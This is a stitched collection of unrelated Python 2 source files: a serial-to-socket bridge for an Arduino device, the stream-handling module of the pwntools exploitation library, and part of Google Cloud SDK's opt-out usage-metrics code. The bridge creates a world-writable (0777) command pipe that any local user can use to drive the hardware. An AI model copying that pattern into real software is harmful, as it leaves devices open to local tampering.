# mc = self.active.media_controller
# while True:
# cur_id = mc.status.content_id
# if cur_id != self.active_id:
# self._set_active_content(cur_id, mc.status.title)
# time.sleep(1.0)
#
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
thread = MonitorThread()
thread.start()
try:
while True:
time.sleep(1.0)  # avoid a busy-wait while the monitor thread runs
except KeyboardInterrupt:
print("Stopping thread...")
thread.stop()
|
deviceWebSocket.py
|
#!/usr/bin/env python
import os, serial, threading, select
import json
import socket
from time import sleep
import datetime
import termios, sys
import atexit
import optparse
import random
import simulator
import RTC_DS1307 as RTC
global mysocketMessage
global mysocketMessageJSON
global myEvent
class socketMessage:
def __init__(self):
self.counter = 0
self.text = 'idle'
self.Line = ''
self.status = 'idle'
class deviceWebSocket:
def __init__(self, port, baudrate, parity, echo, simulation):
global myEvent
global mysocketMessage
self.clientMessage = ''
self.receivedString = ''
# background or interactive mode?
if os.isatty(sys.stdin.fileno()):
# command line mode.
print "started from command line"
self.termTrueFalse = True
self.RTCinstalled = 0
pass
else:
# Cron mode.
print "started from cron"
self.termTrueFalse = False
self.RTCinstalled = 1
pass
if self.RTCinstalled == 1:
self.myrtc = RTC.RTC_DS1307()
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
else:
nowdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print nowdatetime
myEvent = threading.Event()
mysocketMessage = socketMessage()
if self.termTrueFalse == True:
# Save the terminal settings
self.fd = sys.stdin.fileno()
self.new_term = termios.tcgetattr(self.fd)
self.old_term = termios.tcgetattr(self.fd)
# New terminal setting unbuffered
# self.new_term[3] = (self.new_term[3] & ~termios.ICANON & ~termios.ECHO)
self.new_term[3] = (self.new_term[3] & ~termios.ICANON)
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.new_term)
# Support normal-terminal reset at exit
atexit.register(self.set_normal_term)
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, timeout=1)
self.echo = echo
self.counter = 0
self.simulation = simulation
self.previousdatetime="2016-09-11 00:37:41"
print '--- deviceWebSocket on %s: %d,%s,%s,%s ---' % (
self.serial.port,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits,
)
self.consoleMessage('x:Exit ')
def getch(self):
# Returns a keyboard character after kbhit() has been called.
# Should not be called in the same program as getarrow().
s = ''
return sys.stdin.read(1)
def kbhit(self):
# Returns True if keyboard character was hit, False otherwise.
dr, dw, de = select.select([sys.stdin], [], [], 0)
return dr != []
def consoleMessage(self, message):
if self.termTrueFalse == True:
print message + chr(0x0D)
# print '\n'
def set_normal_term(self):
print "set_normal_term()"
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old_term)
def start(self):
self.alive = True
if self.simulation == True:
self.simulate_thread = threading.Thread(target=self.simulate)
self.simulate_thread.setDaemon(1)
self.simulate_thread.start()
else:
self.deviceReader_thread = threading.Thread(target=self.deviceReader)
self.deviceReader_thread.setDaemon(1)
self.deviceReader_thread.start()
if self.termTrueFalse == True:
self.consoleReader_thread = threading.Thread(target=self.consoleReader)
self.consoleReader_thread.setDaemon(1)
self.consoleReader_thread.start()
self.deviceWriter_thread = threading.Thread(target=self.deviceWriter)
self.deviceWriter_thread.setDaemon(1)
self.deviceWriter_thread.start()
self.socketServer_thread = threading.Thread(target=self.socketServer)
self.socketServer_thread.setDaemon(1)
self.socketServer_thread.start()
self.Timer_thread = threading.Thread(target=self.myTimer)
self.Timer_thread.setDaemon(1)
self.Timer_thread.start()
if self.termTrueFalse == True:
self.consoleReader_thread.join()
if self.simulation == False:
self.deviceReader_thread.join()
# self.socketServer.join()
# self.socketServer_thread.join()
def stop(self):
self.alive = False
self.serial.close()
sys.exit(1)
def simulate(self):
while True:
sleep(4.0)
# self.consoleMessage("simulate")
volt1 = random.uniform(7.9, 8.2)
receivedString = "10190 11.15 151.2 1686.1 %f 0.0 0.0 0.00 199.00 200.00" % volt1
self.consoleMessage('Received: %s' % receivedString.rstrip())
evaluateString = "DATA: %s" % receivedString.rstrip()
self.evaluateResponse(evaluateString)
def myTimer(self):
# keep socket connection alive
global mysocketMessage
global mysocketMessageJSON
global myEvent
while True:
sleep(5)
self.consoleMessage('keep socket connection alive timer event')
mysocketMessage.counter = mysocketMessage.counter + 1
mysocketMessage.text = 'idle'
mysocketMessage.Line = ''
mysocketMessage.status = 'idle'
self.sendSocketMessage()
def socketServer(self):
global myEvent
global mysocketMessage
global mysocketMessageJSON
s = socket.socket() # Create a socket object
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = socket.gethostname() # Get local machine name
print 'Host name = %s' % host
port = 12344 # Reserve a port for your service.
# s.bind((host, port)) # Bind to the port
# s.bind(('127.0.0.1', port))
s.bind(('localhost', port))
s.listen(5) # Now wait for client connection.
self.counter = 0
while True:
socketConn, addr = s.accept() # Establish connection with client.
# self.dump(addr)
self.consoleMessage('Got connection from %s' % str(addr))
# print 'Got connection from', addr
recv = socketConn.recv(4096)
self.clientMessage = recv
if len(self.clientMessage) > 1:
print "client message %s" % self.clientMessage
if 'waits' in self.clientMessage:
print 'client waits'
# hold loop until new message ready to send
myEvent.wait()
socketConn.send(mysocketMessageJSON)
socketConn.close() # Close the connection
# sleep(2)
def dump(self, obj):
for attr in dir(obj):
print "obj.%s = %s" % (attr, getattr(obj, attr))
def sendSocketMessage(self):
global mysocketMessage
global mysocketMessageJSON
global myEvent
mysocketMessage.counter = mysocketMessage.counter + 1
Line = mysocketMessage.Line
counter = mysocketMessage.counter
status = mysocketMessage.status
mysocketMessageJSON = json.dumps({'status': status, 'counter':counter, 'Line':Line}, indent=0)
myEvent.set()
myEvent.clear()
def deviceWriter(self):
while True:
self.counter += 1
self.consoleMessage('deviceWriter thread alive %d\n' % self.counter)
# the name of the pipe
pipeNameIn = '/dev/shm/deviceWebSocketPipe'
# we will get an error if the pipe exists
# when creating a new one, so try removing it first
try:
os.unlink(pipeNameIn)
except:
pass
# create the pipe and open it for reading
os.mkfifo(pipeNameIn)
os.chmod(pipeNameIn, 0777)
pipe = open(pipeNameIn, 'r')
# read forever and print anything written to the pipe
data = pipe.readline()
if data != '':
print 'Received from pipe:'
print data
self.decoded = json.loads(data)
if 'commands' in self.decoded:
mycommand = self.decoded['commands']
if 'param' in self.decoded:
param = self.decoded['param']
self.COMMAND(mycommand, param)
sleep(0.5)
def COMMAND(self, command, param):
#print 'Command:'
#print command
if 'PWM' in command:
#print 'PWM found %d' % param
newPWM = int(param)
arduinoMessageJSON = '{"PWM":%d}' % newPWM
self.serial.write(arduinoMessageJSON)
# Wait for output buffer to drain.
self.serial.flush()
if self.simulation == True:
simulator.processCommands(self, command)
def deviceReader(self):
try:
while self.alive:
data = self.serial.read(1)
if data != '':
self.receivedString += data
if data == '\x0A':
self.consoleMessage('Received: %s' % self.receivedString.rstrip())
evaluateString = "DATA: %s" % self.receivedString.rstrip()
self.evaluateResponse(evaluateString)
self.receivedString = ''
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interrupted at this
# point...
raise
def evaluateResponse(self, message):
global mysocketMessage
# print message
if 'LINE' in message:
print 'LINE found'
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
RTCTime = self.myrtc.read_str()
RTCTimeShort = '%s%s' % (RTCTime[0:8], RTCTime[9:17])
curdate = '20%s' % (RTCTime[0:8])
curdatetime = '20' + RTCTime
else:
curdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
output = "%s %s" % (curdatetime, message.rstrip())
mysocketMessage.status = 'measure'
mysocketMessage.Line = output
self.sendSocketMessage()
if 'DATA' in message:
# print 'DATA found'
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
RTCTime = self.myrtc.read_str()
RTCTimeShort = '%s%s' % (RTCTime[0:8], RTCTime[9:17])
curdate = '20%s' % (RTCTime[0:8])
curdatetime = '20' + RTCTime
else:
curdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
curdate = curdatetime[0:10]
output = "%s %s" % (curdatetime, message.rstrip())
mysocketMessage.status = 'measure'
mysocketMessage.Line = output
# print mysocketMessage.Line
self.sendSocketMessage()
#print curdatetime[5:7]
#print curdatetime[8:10]
yearc=int(curdatetime[0:4])
monc=int(curdatetime[5:7])
dayc=int(curdatetime[8:10])
hourc=int(curdatetime[11:13])
minc=int(curdatetime[14:16])
secc=int(curdatetime[17:19])
yearp=int(self.previousdatetime[0:4])
monp=int(self.previousdatetime[5:7])
dayp=int(self.previousdatetime[8:10])
hourp=int(self.previousdatetime[11:13])
minp=int(self.previousdatetime[14:16])
secp=int(self.previousdatetime[17:19])
a = datetime.datetime(yearc,monc,dayc,hourc,minc,secc)
b = datetime.datetime(yearp,monp,dayp,hourp,minp,secp)
diff=(a-b).total_seconds()
#print a.strftime('%Y-%m-%d %H:%M:%S')
#print diff
if(diff>30):
self.previousdatetime=curdatetime
fileName = ("../writeFiles/ardData%s.txt" % curdate)
fh = open(fileName, "a")
fh.write(output+ "\n")
fh.close()
if 'END_DATA' in message:
# print 'END_DATA found'
mysocketMessage.status = 'complete'
self.sendSocketMessage()
pass
def consoleReader(self):
# loop until EXITCHARACTER character
try:
while self.alive:
try:
# c = self.getkey()
c = self.getch()
except KeyboardInterrupt:
c = '\x03'
if c == 'x':
print 'Exit'
if self.termTrueFalse == True:
self.set_normal_term()
self.stop()
break # exit app
# if c == 'i':
# mySocketMessage.status = 'idle'
# self.sendSocketMessage()
except:
self.alive = False
raise
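# Hypothetical client sketch (an illustration, not used by this script): the
# socket server above listens on localhost:12344; a request containing "waits"
# is held until the next measurement is ready and then receives one JSON
# object with "status", "counter" and "Line".
def exampleSocketClient():
    client = socket.socket()
    client.connect(('localhost', 12344))
    client.send('waits'.encode())   # ask the server to block until new data
    reply = client.recv(4096)       # JSON produced by sendSocketMessage()
    client.close()
    return json.loads(reply.decode())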
def main():
global deviceWebSocket
parser = optparse.OptionParser(
usage="%prog [options] [port [baudrate]]",
description="deviceWebSocket"
)
parser.add_option("-p", "--port",
dest="port",
help="port, a number (default 0) or a device name (deprecated option)",
default='/dev/ttyS0'
)
parser.add_option("-b", "--baud",
dest="baudrate",
action="store",
type='int',
help="set baud rate, default %default",
default=9600
)
parser.add_option("--parity",
dest="parity",
action="store",
help="set parity, one of [N, E, O, S, M], default=N",
default='N'
)
parser.add_option("-s", "--sim",
dest="simulation",
action="store_true",
help="simulation (default off)",
default=False
)
parser.add_option("-e", "--echo",
dest="echo",
action="store_true",
help="enable local echo (default off)",
default=False
)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
try:
deviceWebSocket = deviceWebSocket(
port,
baudrate,
options.parity,
echo=options.echo,
simulation=options.simulation
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
deviceWebSocket.start()
if __name__ == '__main__':
main()
|
tube.py
|
from .. import log, log_levels, context, term, atexit, thread
from ..util import misc
import re, threading, sys, time, subprocess
def _fix_timeout(timeout, default):
if timeout == 'default':
return default
elif timeout == None:
return timeout
elif isinstance(timeout, (int, long, float)):
if timeout < 0:
log.error("timeout cannot be negative")
else:
return timeout
else:
log.error("timeout must be either a number, None or the string 'default'")
class tube(object):
"""Container of all the tube functions common to both sockets, TTYs and SSH connetions."""
def __init__(self, timeout='default'):
self.buffer = []
self.timeout = _fix_timeout(timeout, context.timeout)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = 'default'):
"""recv(numb = 4096, timeout = 'default') -> str
Receives up to `numb` bytes of data from the tube.
If a timeout occurs while waiting, it will return None.
If the connection has been closed for receiving,
:exc:`exceptions.EOFError` will be raised.
If the string "default" is given as the timeout, then
the timeout set by the constructor or :func:`settimeout`
will be used. If None is given, then there will be no timeout.
It will also print a debug message with log level
:data:`pwnlib.log_levels.DEBUG` about the received data.
"""
if self.buffer:
data = []
n = 0
while self.buffer and n < numb:
s = self.buffer.pop()
data.append(s)
n += len(s)
if n < numb:
try:
s = self._recv(numb - n, timeout = 0)
if s != None:
data.append(s)
except EOFError:
pass
elif n > numb:
s = data.pop()
delta = n - numb
self.buffer.append(s[delta:])
data.append(s[:delta])
return ''.join(data)
return self._recv(numb, timeout = timeout)
def _recv(self, numb = 4096, timeout = 'default'):
"""_recv(numb = 4096, timeout = 'default') -> str
Receives one chunk of data from the internal buffer or from the OS if the
buffer is empty.
"""
# If there is already data, go with that
if self.buffer:
data = self.buffer.pop()
else:
if timeout == 'default':
data = self.recv_raw(4096)
else:
timeout = _fix_timeout(timeout, self.timeout)
old_timeout = self.timeout
self.settimeout(timeout)
data = self.recv_raw(4096)
self.settimeout(old_timeout)
if data == None:
return None
else:
if context.log_level <= log_levels.DEBUG:
for line in data.splitlines(True):
log.debug('Received: %r' % line)
if len(data) > numb:
self.buffer.append(data[numb:])
data = data[:numb]
return data
def recvpred(self, pred, timeout = 'default'):
"""recvpred(pred, timeout = 'default') -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If a timeout occurs while waiting, it will return None, and any
received bytes will be saved for later. It will never return
partial data, which did not make the predicate become True.
If the connection has been closed for receiving,
:exc:`exceptions.EOFError` will be raised.
.. note::
Note that any data received before the occurrence of an exception,
will be saved for use by a later receive. This means that
even if you get an :exc:`exceptions.EOFError`, you might in rare
cases be able to do a receive anyways.
If the string "default" is given as the timeout, then
the timeout set by the constructor or :func:`settimeout`
will be used. If None is given, then there will be no timeout.
"""
data = ''
try:
while not pred(data):
res = self._recv(1, timeout)
if res == None:
self.buffer.append(data)
return None
data += res
except:
self.buffer.append(data)
raise
return data
def recvn(self, numb, timeout = 'default'):
"""recvn(numb, timeout = 'default') -> str
Receives exactly `numb` bytes.
"""
data = []
n = 0
while n < numb:
try:
res = self._recv(timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
n += len(res)
data.append(res)
if numb < n:
s = data.pop()
delta = len(s) - (n - numb)
self.buffer.append(s[delta:])
data.append(s[:delta])
return ''.join(data)
def recvuntil(self, delims, timeout = 'default'):
"""recvuntil(delims, timeout = 'default') -> str
Continue receiving until the received data ends with one of `delims`.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
delimslen = max(len(delim) for delim in delims)
data = ''
i = 0
while True:
try:
res = self._recv(timeout = timeout)
if res == None:
self.buffer.append(data)
return None
except:
self.buffer.append(data)
raise
data += res
for delim in delims:
j = data.find(delim, i)
if j > -1:
j += len(delim)
data, rest = data[:j], data[j:]
if rest:
self.buffer.append(rest)
return data
if len(data) > delimslen:
i = len(data) - delimslen + 1
def recvlines(self, numlines, keepends = False, timeout = 'default'):
"""recvlines(numlines, keepends = False) -> str list
Receive `numlines` lines. The lines are returned as a list.
Line breaks are not included unless `keepends` is set to :const:`True`.
"""
data = []
for _ in xrange(numlines):
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
data.append(res)
if keepends:
return data
return [line[:-1] for line in data]
def recvline(self, delims = None, keepend = False, timeout = 'default'):
"""recvline(delims = None, keepend = False) -> str
If `delims` is :const:`None`, then receive and return exactly one line.
Otherwise, keep receiving lines until one is found which contains at
least one of `delims`. The last line received will be returned.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if delims == None:
res = self.recvlines(1, keepends = keepend, timeout = timeout)
if res == None:
return None
return res[0]
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(delim in res for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_pred(self, pred, keepend = False, timeout = 'default'):
"""recvline_pred(pred, keepend = False) -> str
Keep receiving lines until one, ``line``, is found such that
``bool(pred(line)) == True``. Returns the last line received.
Only includes the line break if `keepend` is set to :const:`True`.
"""
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
if pred(res):
break
except:
self.buffer.extend(data)
raise
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_startswith(self, delims, keepend = False, timeout = 'default'):
"""recvline_startswith(delims, keepend = False) -> str
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(res.startswith(delim) for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_endswith(self, delims, keepend = False, timeout = 'default'):
"""recvline_endswith(delims, keepend = False) -> str
Keep receiving lines until one is found that ends with one of `delims`.
Returns the last line received.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(res.endswith(delim) for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvregex(self, regex, exact = False, timeout = 'default'):
"""recvregex(regex, exact = False, timeout = 'default') -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepend = False,
timeout = 'default'):
"""recvregex(regex, exact = False, keepend = False,
timeout = 'default') -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepend = keepend, timeout = timeout)
def recvrepeat(self, timeout = 'default'):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
"""
timeout = _fix_timeout(timeout, self.timeout)
if timeout == None:
timeout = 0.1
r = []
while True:
try:
s = self.recv(10000, timeout = timeout)
except EOFError:
break
if s == None:
break
r.append(s)
return ''.join(r)
def recvall(self):
"""recvall() -> str
Receives data until EOF is reached.
"""
h = log.waitfor('Receiving all data')
l = 0
r = []
while True:
try:
s = self.recv(timeout = 0.1)
except EOFError:
break
if s == None:
continue
r.append(s)
l += len(s)
h.status(misc.size(l))
h.success()
self.close()
return ''.join(r)
def send(self, data):
"""send(data)
Sends data. Will also print a debug message with
log level :data:`pwnlib.log_levels.DEBUG` about it.
If it is not possible to send anymore because of a closed
connection, it raises an :exc:`exceptions.EOFError`.
"""
if context.log_level <= log_levels.DEBUG:
for line in data.splitlines(True):
log.debug('Send: %r' % line)
self.send_raw(data)
def sendline(self, line):
"""sendline(data)
Shorthand for ``send(data + '\\n')``.
"""
self.send(line + '\n')
def sendafter(self, delim, data, timeout = 'default'):
"""sendafter(delim, data, timeout = 'default') -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``."""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = 'default'):
"""sendlineafter(delim, data, timeout = 'default') -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = 'default'):
"""sendthen(delim, data, timeout = 'default') -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = 'default'):
"""sendlinethen(delim, data, timeout = 'default') -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + '\n')
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works while in :data:`pwnlib.term.term_mode`.
"""
log.info('Switching to interactive mode')
go = [True]
def recv_thread(go):
while go[0]:
try:
cur = self.recv(timeout = 0.05)
if cur == None:
continue
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
log.info('Got EOF while reading in interactive')
break
t = thread.Thread(target = recv_thread, args = (go,))
t.daemon = True
t.start()
try:
while go[0]:
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go[0] = False
log.info('Got EOF while sending in interactive')
else:
go[0] = False
except KeyboardInterrupt:
log.info('Interrupted')
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
"""
self.recvrepeat(timeout = timeout)
def clean_and_log(self, timeout = 0.05):
"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.log.info`.
"""
if self.connected():
log.info('Cleaning tube (fileno = %d):' % self.fileno())
log.indented(self.recvrepeat(timeout = timeout))
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object."""
def pump():
import sys as _sys
while True:
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if data == None:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = thread.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object."""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
self.connect_input(other)
return other
def __rshift__(self, other):
self.connect_output(other)
return other
def __ne__(self, other):
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds."""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
"""
self.timeout = _fix_timeout(timeout, context.timeout)
self.settimeout_raw(self.timeout)
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for further reading or writing depending on `direction`.
Args:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
"""
if direction in ('in', 'read', 'recv'):
direction = 'recv'
elif direction in ('out', 'write', 'send'):
direction = 'send'
else:
log.error('direction must be "in", "read" or "recv", or "out", "write" or "send"')
self.shutdown_raw(direction)
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Args:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
"""
if direction in ('in', 'read', 'recv'):
direction = 'recv'
elif direction in ('out', 'write', 'send'):
direction = 'send'
elif direction == 'any':
pass
else:
log.error('direction must be "any", "in", "read" or "recv", or "out", "write" or "send"')
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
>>> shell = ssh(host='bandit.labs.overthewire.org',user='bandit0',password='bandit0') # doctest: +SKIP
>>> with shell.run('bash') as s: # doctest: +SKIP
... s.sendline('echo helloworld; exit;')
... print 'helloworld' in s.recvall()
...
True
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout it should return None; in case
of a closed connection it should raise an :exc:`exceptions.EOFError`.
"""
log.bug('Should be implemented by a subclass.')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should raise :exc:`exceptions.EOFError` if it is unable to send any
more, because of a closed tube.
"""
log.bug('Should be implemented by a subclass.')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
log.bug('Should be implemented by a subclass.')
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
log.bug('Should be implemented by a subclass.')
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
log.bug('Should be implemented by a subclass.')
def close(self):
"""close()
Closes the tube.
"""
log.bug('Should be implemented by a subclass.')
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
log.bug('Should be implemented by a subclass.')
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
log.bug('Should be implemented by a subclass.')
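# --- Illustrative sketch (not part of the original module) -------------------
# The "minimal interface" docstrings above describe what a subclass has to
# implement. Below is a minimal in-memory loopback tube for illustration only;
# it assumes the enclosing class is named `tube` (as the docstrings suggest)
# and that its __init__ can be called without arguments.
class _loopback_tube(tube):
    def __init__(self):
        super(_loopback_tube, self).__init__()
        self._data = ''
        self._closed = False
    def recv_raw(self, numb):
        if self._closed and not self._data:
            raise EOFError
        if not self._data:
            return None                      # behaves like a timeout
        out, self._data = self._data[:numb], self._data[numb:]
        return out
    def send_raw(self, data):
        if self._closed:
            raise EOFError
        self._data += data                   # loop sent data back to recv
    def settimeout_raw(self, timeout):
        pass
    def can_recv_raw(self, timeout):
        return bool(self._data)
    def connected_raw(self, direction):
        return not self._closed
    def close(self):
        self._closed = True
    def fileno(self):
        return -1                            # no real file descriptor here
    def shutdown_raw(self, direction):
        pass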
|
metrics.py
|
# Copyright 2013 Google Inc. All Rights Reserved.
"""Used to collect anonymous SDK usage information."""
import atexit
import collections
import hashlib
import mutex
import os
import Queue
import socket
import sys
import threading
import urllib
import uuid
import httplib2
from googlecloudsdk.core import config
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.util import platforms
_ENDPOINT = 'https://ssl.google-analytics.com/collect'
_TID = 'UA-36037335-2'
_Event = collections.namedtuple('Event',
['category', 'action', 'label', 'value'])
class _MetricsWorker(object):
"""A class to process usage events."""
DONE = 'DONE'
@staticmethod
def StartMetrics():
"""Starts the thread for handling events.
Returns:
The running MetricsWorker or None if initialization failed.
"""
disabled = properties.VALUES.core.disable_usage_reporting.GetBool()
if disabled is None:
# If there is no preference set, fall back to the installation default.
disabled = config.INSTALLATION_CONFIG.disable_usage_reporting
if disabled:
log.debug('Metrics are disabled.')
return None
try:
return _MetricsWorker()
# pylint: disable=bare-except, We never want to fail because of metrics.
# Worst case scenario, they are just not sent.
except:
# If any part of this fails, just don't do any reporting
log.debug('Metrics failed to start: %s', sys.exc_info())
return None
def __init__(self):
"""Initialize a new MetricsWorker.
This should only be invoked through the static StartMetrics() function, which
will do the appropriate error handling.
"""
user_agent = 'CloudSDK/{version} {fragment}'.format(
version=config.CLOUD_SDK_VERSION,
fragment=platforms.Platform.Current().UserAgentFragment())
self.__headers = {
'User-Agent': user_agent,
}
self.__project_ids = {}
hostname = socket.getfqdn()
install_type = 'Google' if hostname.endswith('.google.com') else 'External'
self.__params = [
('v', '1'),
('tid', _TID),
('cid', _MetricsWorker.__GetCID()),
('t', 'event'),
('cd1', config.INSTALLATION_CONFIG.release_channel),
('cd2', install_type),
]
self.__queue = Queue.Queue()
self.__thread = self.__Start()
log.debug('Metrics started...')
@staticmethod
def __GetCID():
"""Gets the client id from the config file, or generates a new one.
Returns:
str, The hex string of the client id.
"""
uuid_path = config.Paths().analytics_cid_path
cid = None
if os.path.exists(uuid_path):
with open(uuid_path) as f:
cid = f.read()
if cid:
return cid
with open(uuid_path, 'w') as f:
cid = uuid.uuid4().hex
f.write(cid) # A random UUID
return cid
def __Start(self):
"""Starts the reporting thread.
Returns:
The running Thread object.
"""
t = threading.Thread(target=self.__Run)
t.daemon = True
t.start()
return t
def __Run(self):
# Save local references for speed.
queue = self.__queue
base_params = self.__params
headers = self.__headers
while True:
event = queue.get()
try:
if event == _MetricsWorker.DONE:
return
self.__SendEvent(headers, base_params, event)
log.debug('Sent event: %s', str(event))
